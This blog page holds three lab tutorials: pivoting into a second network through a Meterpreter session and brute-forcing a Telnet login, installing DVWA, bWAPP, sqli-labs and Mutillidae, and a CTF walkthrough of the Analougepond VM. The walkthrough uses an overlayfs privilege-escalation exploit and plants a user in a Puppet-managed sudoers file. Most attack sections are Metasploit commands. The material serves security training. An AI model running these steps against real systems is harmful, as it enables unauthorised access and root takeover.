Showing posts with label Kali Linux. Show all posts
Showing posts with label Kali Linux. Show all posts

Telnet Pivoting through Meterpreter

In our previous tutorial we had discussed on SSH pivoting and today we are going to discuss Telnet pivoting.
From Offensive Security
Pivoting is technique to get inside an unreachable network with help of pivot (centre point). In simple words it is an attack through which attacker can exploit those system which belongs to different network. For this attack, the attacker needs to exploit the main server that helps the attacker to add himself inside its local network and then attacker will able to target the client system for attack.
Lab Setup requirement:
Attacker machine: Kali Linux
Pivot Machine (client): window operating system with two network interface

Target Machine: Ubuntu server (Allow telnet service)


Exploit pivot machine
Use exploit MS17-010 or multi handler to hack the pivot machine.
sessions
From given image you can confirm that I owned pivot machine (192.168.1.107) meterpreter session1.

Verify network interface of pivot

Check network interface through following command:
Meterpreter> ifconfig
From given image you can observe two networks interface in pivot’s system 1st for IP 192.168.1.107 through which attacker is connected and 2nd for IP 10.0.0.20 through which telnet server (targets) are connected.

Route Add

Since attacker belongs to 192.168.1.1 interface and target belongs to 10.0.0.0 interface therefore it is not possible to directly make attack on target network until unless the attacker acquires same network connection. In order to achieve 10.0.0.0 network attacker need run the post exploitation “autoroute”.
use post/multi/manage/autoroute 
msf post(autoroute) > set session 1
msf post(autoroute) > exploit

This Module will perform an ARP scan for a given IP range through a Meterpreter Session.
use post/windows/gather/arp_scanner
msf post(arp_scanner) > set rhosts 10.0.0.1-30
msf post(arp_scanner) > set session 1
msf post(arp_scanner) > set thread 20
msf post(arp_scanner) > exploit
 Here we found a new IP 10.0.0.10 as shown in given image. Let’s perform TCP port scan for activated services on this machine.

This module Enumerates open TCP services by performing a full TCP connect on each port. This does not need administrative privileges on the source machine, which may be useful if pivoting.
use auxiliary/scanner/portscan/tcp
msf auxiliary(tcp) > set ports 23
msf auxiliary(tcp) > set rhosts 10.0.0.1
msf auxiliary(tcp) > set thread 10
msf auxiliary(tcp) >exploit
From given you can observe port 23 is open and we know that port 23 is used for telnet service.

Use Telnet login Brute Force Attack
An attacker always tries to make brute force attack for stealing credential for unauthorized access.
This module will test a telnet login on a range of machines and report successful logins. If you have loaded a database plugin and connected to a database this module will record successful logins and hosts so you can track your access.
Now type following command to Brute force TELNET login:
use auxiliary/scanner/telnet/telnet_login
msf auxiliary(telnet_login) > set rhosts 10.0.0.10
msf auxiliary(telnet_login) > set user_file /root/Desktop/user.txt
msf auxiliary(telnet_login) > set pass_file /root/Desktop/pass.txt
msf auxiliary(telnet_login) > exploit
From given image you can observe that TELNET server is not secure against brute force attack because it is showing matching combination of username: aarti and password: 123 for login simultaneously it has opened victims command shell as session 2


Let’s count the number of victim sessions we have hold using following command:
sessions
From given image you can observe there are two sessions 1st as meterpreter session of windows system and 2nd as command shell of telnet server.


sessions 2
Now attacker is command shell of server, let’s verify through network configuration.
Ifconfig
From given you can observe the network IP is 10.0.0.10

Configure Web Application Pentest Lab

In our previous article you had learnt how to configure a web server using ubuntu system with the help of LAMP services for designing your own pentest lab. Today you will how to configure the famous 4 web application (DVWA, bWAPP, SQLI and Mutillidae) inside web server for web penetration (WAPT) practices.

Let’s Begin!!

Open the terminal and login with root user and move inside html directory using following command.
sudo bash
cd /var/www/html
Basically to operate all web application on browser through localhost you should download and configure these web application inside html directory only.


DVWA
Damn Vulnerable Web App (DVWA) is a PHP/MySQL web application that is damn vulnerable. Its main goals are to be an aid for security professionals to test their skills and tools in a legal environment, help web developers better understand the processes of securing web applications.

Download dvwa inside html using following command.

wget https://github.com/ethicalhack3r/DVWA/archive/master.zip


Now type following command step by step to configure dvwa.

ls
From given image you can see we have downloaded master.zip file, now unzip this file using below command.
unzip master.zip


After unzip, move file and folder of DVWA-master into dvwa
ls
mv DVWA-master dvwa
ls
cd dvwa
ls



After then move inside config in order to rename config.inc.php.dist into config.inc.php
cd config/
ls
mv config.inc.php.dist config.inc.php


gedit config.inc.php
Now open config.inc.php using above command, here you will observe that db_password is p@ssw0rd.  But remove the password and left it blank space for db_password.


 After leaving blank password save config.inc.php


Now run web application in browser through URL:  localhost/dvwa/setup.php
As shown in given image a web page will get open for dvwa setup, now click on given tab Create/ Reset Database.


Login into web application through URL: localhost/dvwa/login.php
By default the username and password is admin: password respectively for login into dvwa.


Using above step for installation you can configure dvwa in your web server and perform web penetration testing by exploiting given vulnerabilities.


bWAPP
buggy web application is a deliberately insecure web application. It helps security enthusiasts, systems engineers, developers and students to discover and to prevent web vulnerabilities. bWAPP prepares one to conduct successful web application penetration testing and ethical hacking projects. It is made for educational purposes.

Now download bwapp and then unzip that folder.
cd /var/www/html
Now shift bwapp from download directory to html directory using move command
mv /home/raj/downloads/bwapp_latest/bwapp .
ls
Now you can observe we have bwapp inside html directories.


Now make following changes inside the file “setting.php” for its configuration.
cd admin
ls
gedit setting.php


Here remove the password “bug” for db_password as done above.


Now Leave blank space for db_password and then save the file.

Now browse web application through URL: localhost/bwapp/install.php
As shown in image a web page will get open for installation; now click on given link “click hereto install wapp”. After that your bwapp will get successfully install and will ready for penetration testing.


Now use default username and password bee: bug for login into bwapp and start your practice.

SQLI
SQLI labs to test error based, Blind boolean based, Time based.
cd /var/www/html
Download SQLI dhakkan inside html directory and then unzip it.
wget https://github.com/Audi-1/sqli-labs.git


unzip master.zip


Now open web application inside browser using URL: localhost/sqli
Click on “Setup/reset Database for labs”             

Copy all file and folder of sqli-labs-master into sqli using following command
mv sqli-labs-master sqli


Now open web application inside browser using URL: localhost/sqli Click on “Setup/reset Database for labs”    

 This will create database setup for lab and after that it will be ready for SQL penetration testing. This lab is design for mainly sql injection attack each lesson have different sql error.



OWASP Mutillidae II Web Pen-Test Practice Application

OWASP Mutillidae II is a free, open source, deliberately vulnerable web-application providing a target for web-security enthusiest. Mutillidae can be installed on Linux and Windows using LAMP, WAMP, and XAMMP. It is pre-installed on SamuraiWTF, Rapid7 Metasploitable-2, and OWASP BWA. The existing version can be updated on these platforms. With dozens of vulns and hints to help the user; this is an easy-to-use web hacking environment designed for labs, security enthusiast, classrooms, CTF, and vulnerability assessment tool targets. Mutillidae has been used in graduate security courses, corporate web sec training courses, and as an “assess the assessor” target for vulnerability assessment software

Download mutillidae using following command
cd /var/www/html
Move file and folder of mutillidae from inside download into var/www/html by typing following command
mv /home/raj/Downloads/mutillidae


This web application does not required extra configuration setting you can directly open it inside browser using URL: localhost/mutillidae
Now use your pentesting skill to exploit its vulnerability.

Hack the Analougepond VM (CTF Challenge)

Hello friends! Today we are going to take another CTF channeling known as Analougepond which Based on our previous article “SSH pivoting”, if you are aware of ssh pivoting then you can easily breach this vm machine.

The credit for making this vm machine goes to “Knightmare” and it is another boot to root machine where author has hide flag for attacker as the new challenge.

Lets Breach!!!

The target holds 192.168.0.108 as network IP; now using nmap lets find out open ports.
nmap -sT -sU 192.168.0.108


From give image you can check port 22 for SSH, 68 for DHCP and 161 for SNMP are open in target network.


Now let’s enumerate for SNMP enumeration using metasploit
This module allows enumeration of any devices with SNMP protocol support. It supports hardware, software, and network information. The default community used is "public"

use auxiliary/scanner/snmp/snmp_enum
msf auxiliary(snmp_enum) > set rhosts 192.168.0.108
msf auxiliary(snmp_enum) > set threads 5
msf auxiliary(snmp_enum) > exploit

From given image you can read system information, like host IP, hostname, description and etc. you will notice that here I had highlighted contact which contain a name Eric Burdon and location which contains some text “there is a hose in New Orleans they call it………
Here eric could be a hint for username, now let ask from Google for “there is a hose in New Orleans they call it………”


So when I search for given text in Google, I found that these texts are the lyric of a poem “The House of Rising Sun”. It might be possible that the author knightmare wants to give some password clue through this poem. From given image you can read the highlighted text “the Rising Sun” which could be the password for SSH.


Now let’s enumerate for SSH login using metasploit

This module will test ssh logins on a range of machines and report successful logins. If you have loaded a database plugin and connected to a database this module will record successful logins and hosts so you can track your access.

Use auxiliary/scanner/ssh/ssh_login
msf auxiliary(ssh_login) > set rhost 192.168.0.108
msf auxiliary(ssh_login) > set username eric
msf auxiliary(ssh_login) > set password therisingsun
msf auxiliary(ssh_login) >exploit

As result we had successfully login and obtained command shell session 1of targeted system, more found install version of ubuntu i.e. 14.04.1
If you will search in Google you will come to know that ubuntu 14.04.1 is exploitable to overlayfs privilege escalation.


This module attempts to exploit two different CVEs related to overlayfs. CVE-2015-1328: Ubuntu specific -> 3.13.0-24 (14.04 default) < 3.13.0-55 3.16.0-25 (14.10 default) < 3.16.0-41 3.19.0-18 (15.04 default) < 3.19.0-21 CVE-2015-8660: Ubuntu: 3.19.0-18 < 3.19.0-43 4.2.0-18 < 4.2.0-23 (14.04.1, 15.10) Fedora: < 4.2.8 (vulnerable, un-tested) Red Hat: < 3.10.0-327 (rhel 6, vulnerable, un-tested)
use exploit/linux/local/overlayfs_priv_esc
msf exploit(overlayfs_priv_esc) > set  lhost 192.168.1.105
msf exploit(overlayfs_priv_esc) > set session 1
msf exploit(overlayfs_priv_esc) > exploit -j

This times also we had successfully got command shell session 2 opened of target system.


Now convert command shell (for session 2) into meterpreter shell using following command
Sessions -u 2
This will a new session which session 3 for meterpreter shell

Meterpreter> ls
Meterpreter> cat flag.txt
We have Captured 1st flag successfully!!


When as check network interface configuration in target system I found a new IP 192.168.122.1 on its 3rd interface as shown in given image.


This module manages session routing via an existing Meterpreter session. It enables other modules to ‘pivot’ through a compromised host when connecting to the named NETWORK and SUBMASK. Autoadd will search a session for valid subnets from the routing table and interface list then add routes to them. Default will add a default route so that all TCP/IP traffic not specified in the MSF routing table will be routed through the session when pivoting.

msf > use post/multi/manage/autoroute 
msf post(autoroute) > set subnet 192.168.122.1
msf post(autoroute) > set session 3
msf post(autoroute) > exploit


Meterpreter > arp
Here you can check all IP and MAC address, 192.168.122.2 will be another target.


Enumerate open TCP services by performing a full TCP connect on each port. This does not need administrative privileges on the source machine, which may be useful if pivoting.

use auxiliary/scanner/portscan/tcp
msf auxiliary(tcp) > set rhost 192.168.122.2
msf auxiliary(tcp) > set 1-500
msf auxiliary(tcp) > set thread 10
msf auxiliary(tcp) > exploit

From result we found port 22 is open which used for SSH.


Move inside into meterperer shell then type following command for port forwarding of port 22 into port 8000 as shown below:
Sessions 3
Portfwd add -l 8000 -p 22 -r 192.168.122.2


Now login into SSH server through localhost with forwarded port
Ssh localhost -p 8000
From given image you can read the massage again it is a hint for username as “sandieshaw”; now let ask from Google for his famous song to get some hint for password.


After searching on google we guessed that the password should be sandieshaw’s famous song “puppetonastring”.
Now with this password we connect to sandieshaw through ssh.


After connecting to sandieshaw through ssh we found that we have to root this system.

After looking through the files on this system we found that Puppet is running on this system.
Among those files we find that a puppet file contains instructions to copy spin file in root access after ensuring it is present in the /tmp/ folder of the system.


Then we go into the files folder we found two files one in c language and another an executable file.  Opening the c file, we found it is the code for spinning pipe. Now we replace the c executable file with our file that gives the root access to the system.


The puppet file should execute this as root user and we will get the root shell to server.
We then come back to the meterpreter shell and upload it to the current user eric.


After upload it into the system we compile it and send it to the sandieshaw using ssh.
scp spin sandieshaw@192.168.122.2:/home/sandieshaw


Now we replace the spin file in the /etc/puppet/modules/wiggle/files/ with our spin file.


The spin is replaced, now we have to wait for the puppet file to replace the spin file in /tmp/ with our spin file.
After waiting some time we execute the spin file present in /tmp/ folder.


Now we have the root shell, moving into the /root/protovision folder we found a flag that is in hexadecimal format.
After converting it we found a base64 encoded inverse string.


After reversing the string and decoding it we found that it was a link to a youtube video.


Then we moved on to the other files jim and melvin didn’t had anything significant so we moved to the folder .I_have_you_now. There we found a folder .a, to check how many folders were there inside we searched for all the folders inside with command:
find . -type d


We found that it goes all the way to .z, we move to this location to see its content.


We found two files one in gpg encryption and another readable file then we decode this file using command:
gpg nleeson_key.gpg
This will ask a passphrase, the password is secret which is hinted in the video.
Opening the file we found that it was a private key. So we removed the permissions of the file using:
chmod 600 nleeson_key
Then we look at the content of the other file it displayed a single word joshua.

During our network scan we found another ip 192.168.122.3 that had ssh open but we couldn’t connect to it.
Now we try to connect to it using the private key we found.
After guessing a few users we found that nleeson was the user for the system.
using the key will ask for a passphrase and the password is joshua.


We connected to the system 192.168.122.3. After looking around we couldn’t find anything, so we went back into the root of 192.168.122.2. Here after looking through the files we found that 192.168.122.2 was the puppet server and 192.168.122.3 was the puppet client. We found a file called barringsbank-passwd that held all the username and password of 192.168.122.3.


So we added a new user ignite to this file by opening this file in vim.
Linux uses md5 salt hashes as password so we create an md5 hash using ignite and xyz as salt.


 Then we add our user to sudoers to gain root access.


Then we give our new user permissions same as root.


Then we connect to 192.168.122.3 through ssh and using the username and password we just created.


Now we have to wait some time for the puppet server to update the sudoers, so that our user can have root access.
Then we go to root shell using sudo su.
We move into the root folder and find an image file me.jpeg.


We then copy the image file to eric using ssh.
scp me.jpeg eric@192.168.1.119:/home/eric/


Then we download the file from eric to our local system through metasploit. We go to our meterpreter shell and download the me.jpeg to our system.
meterpreter > cd eric/
meterpreter > download me.jpeg /root/Desktop/


We used to exiftool on this file and found nothing so we performed steganography using steghide.
First we check if there is any file hidden behind this image using command:
steghide --info me.jpeg
The passphrase to this file is reticulatingsplines, I found it after various attempts.
Performing steganography we found a file hidden text file.


We extract the text file using steghide, we use the following command:
steghide extract -sf me.jpeg
It will again ask for an password i.e. reticulatingsplines.
After extracting the file we found that it is encrypted in hexadecimal format.


After converting the file from hexadecimal we found that the text was again encrypted in base64 format.



The text contains recurring gACI phrase that doesn’t allow it to be converted from base64 format.
After removing it we found that the text was inversed after reversing and decoding it we got the final flag.